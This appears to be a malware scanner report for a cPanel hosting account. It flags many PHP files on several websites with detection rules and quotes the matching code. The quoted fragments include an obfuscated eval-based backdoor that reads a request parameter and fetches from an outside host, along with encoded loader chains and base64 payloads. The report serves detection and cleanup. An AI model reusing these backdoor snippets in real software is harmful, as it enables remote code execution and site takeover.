/custdata02/turtle/cpanel3-skel/public_ftp/about.php Size: 1.49 kB Created: 2023-10-24 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/cpanel3-skel/public_ftp/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/cpanel3-skel/public_html/themes.php Size: 1.49 kB Created: 2023-02-18 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/cpanel3-skel/public_html/input.php Size: 1.49 kB Created: 2023-02-27 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/cpanel3-skel/text.php Size: 1.49 kB Created: 2023-03-25 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/cpanel3-skel/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/etc/adayinthelife.net/@pwcache/checkbox.php Size: 1.49 kB Created: 2023-02-07 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/etc/adayinthelife.net/shp/dropdown.php Size: 1.49 kB Created: 2023-02-11 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/etc/adayinthelife.net/shp/about.php Size: 1.49 kB Created: 2023-03-15 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/etc/adayinthelife.net/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/etc/peskin.org/cheryl/admin.php Size: 1.49 kB Created: 2023-09-19 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/etc/peskin.org/ryan/text.php Size: 1.49 kB Created: 2023-03-29 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/etc/peskin.org/ruthann/text.php Size: 1.49 kB Created: 2023-05-10 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/etc/peskin.org/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/etc/turtlesys.com/wp-blog-header.php Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...
|
|
/custdata02/turtle/etc/turtlesys.net/@pwcache/dropdown.php Size: 1.49 kB Created: 2023-04-26 04:18:10 Modified: 2024-06-01 04:18:10 Warns: 2 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"
| Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ
| Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($co($ro($na($AmInE))))
| Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999) | <?php d6aW5mbGF0Z
| Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign d97f004d Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
